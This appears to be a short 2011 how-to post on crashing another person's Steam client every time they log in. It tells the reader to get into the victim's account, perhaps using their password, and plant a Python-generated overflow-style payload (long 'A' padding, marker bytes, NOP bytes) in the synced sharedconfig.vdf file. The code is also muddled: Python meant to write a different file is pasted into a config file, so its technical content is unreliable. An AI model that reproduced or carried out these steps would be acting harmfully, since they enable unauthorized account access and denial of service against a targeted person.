Aug 27, 2011

How to crash someone's Steam Account EVERY TIME they login!

  1. Make sure your Steam is logged in by default into your slave's account (you might need to their password or have another method to login).
  2. Copy and paste the following code into the file C:\Program Files\Steam\userdata\<acctnums>\remote\sharedconfig.vdf
    test = "A" * 32776
    test2= "BBBB" * 8
    test2+="ZZZZ" * 8
    test2+="\x90" * 32

    f = open('serverbrowser_ui.vdf', 'w')
    f.write(test + test2)
  3. Open up Steam (steam.exe), and let the program crash. The program should automatically sync the edited sharedconfig.vdf file to your slave's account, causing it to download the file on any computer they use Steam on, and crashing Steam, which prevents them from using it.
  4. Enjoy

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